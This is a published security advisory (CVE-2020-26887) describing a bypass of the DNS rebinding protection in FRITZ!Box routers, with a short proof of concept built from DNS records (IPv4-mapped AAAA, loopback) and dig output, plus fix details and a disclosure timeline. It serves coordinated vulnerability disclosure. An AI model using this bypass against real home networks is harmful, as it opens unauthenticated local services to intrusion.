Kontakt

Kontaktieren Sie uns gerne

+49 241 510081-0
kontakt@redteam-pentesting.de
Kontaktformular
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header

FRITZ!Box DNS Rebinding Protection Bypass

RedTeam Pentesting discovered a vulnerability in FRITZ!Box router devices which allows to resolve DNS answers that point to IP addresses in the private local network, despite the DNS rebinding protection mechanism.

Details

  • Product: FRITZ!Box 7490 and potentially others
  • Affected Versions: 7.20 and below
  • Fixed Versions: >= 7.21
  • Vulnerability Type: Bypass
  • Security Risk: low
  • Vendor URL: https://en.avm.de/
  • Vendor Status: fixed version released
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-003
  • Advisory Status: published
  • CVE: 2020-26887
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-26887

Introduction

“For security reasons, the FRITZ!Box suppresses DNS responses that refer to IP addresses in its own home network. This is a security function of the FRITZ!Box to protect against what are known as DNS rebinding attacks.”

(from the vendor’s homepage)

More Details

FRITZ!Box router devices employ a protection mechanism against DNS rebinding attacks. If a DNS answer points to an IP address in the private network range of the router, the answer is suppressed. Suppose the FRITZ!Box routers DHCP server is in its default configuration and serves the private IP range of 192.168.178.1/24. If a DNS request is made by a connected device, which resolves to an IPv4 address in the configured private IP range (for example 192.168.178.20) an empty answer is returned. However, if instead the DNS answer contains an AAAA-record with the same private IP address in its IPv6 representation (::ffff:192.168.178.20) it is returned successfully. Furthermore, DNS requests which resolve to the loopback address 127.0.0.1 or the special address 0.0.0.0 can be retrieved, too.

Proof of Concept

Supposing the following resource records (RR) are configured for different subdomains of example.com:

private.example.com        1  IN  A     192.168.178.20
local.example.com          1  IN  A     127.0.0.1
privateipv6.example.com.   1  IN  AAAA  ::ffff:192.168.178.20

A DNS request to the FRITZ!Box router for the subdomain private.example.com returns an empty answer, as expected:

$ dig private.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;private.example.com. IN  A

DNS requests for the subdomains privateipv6.example.com and local.example.com return the configured resource records successfully, effectively bypassing the DNS rebinding protection:

$ dig privateipv6.example.com @192.168.178.1 AAAA
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;privateipv6.example.com. IN  AAAA

;; ANSWER SECTION:
privateipv6.example.com. 1    IN  AAAA    ::ffff:192.168.178.20


$ dig local.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;local.example.com.   IN  A

;; ANSWER SECTION:
local.example.com. 1  IN  A   127.0.0.1

Workaround

None.

Fix

The problem is corrected in FRITZ!OS 7.21.

Security Risk

As shown, the DNS rebinding protection of FRITZ!Box routers can be bypassed allowing for DNS rebinding attacks against connected devices. This type of attack however is only possible if vulnerable services are present in the local network, which are reachable over HTTP without authentication. The web interface of FRITZ!Box routers for example is not vulnerable to this type of attack, since the HTTP Host header is checked for known domains. For this reason the risk is estimated to be low.

Timeline

  • 2020-06-23 Vulnerability identified
  • 2020-07-08 Vendor notified
  • 2020-07-20 Vendor provided fixed version to RedTeam Pentesting
  • 2020-07-23 Vendor notified of another problematic IP
  • 2020-08-06 Vendor provided fixed version to RedTeam Pentesting
  • 2020-10-06 Vendor starts distribution of fixed version for selected devices
  • 2020-10-19 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/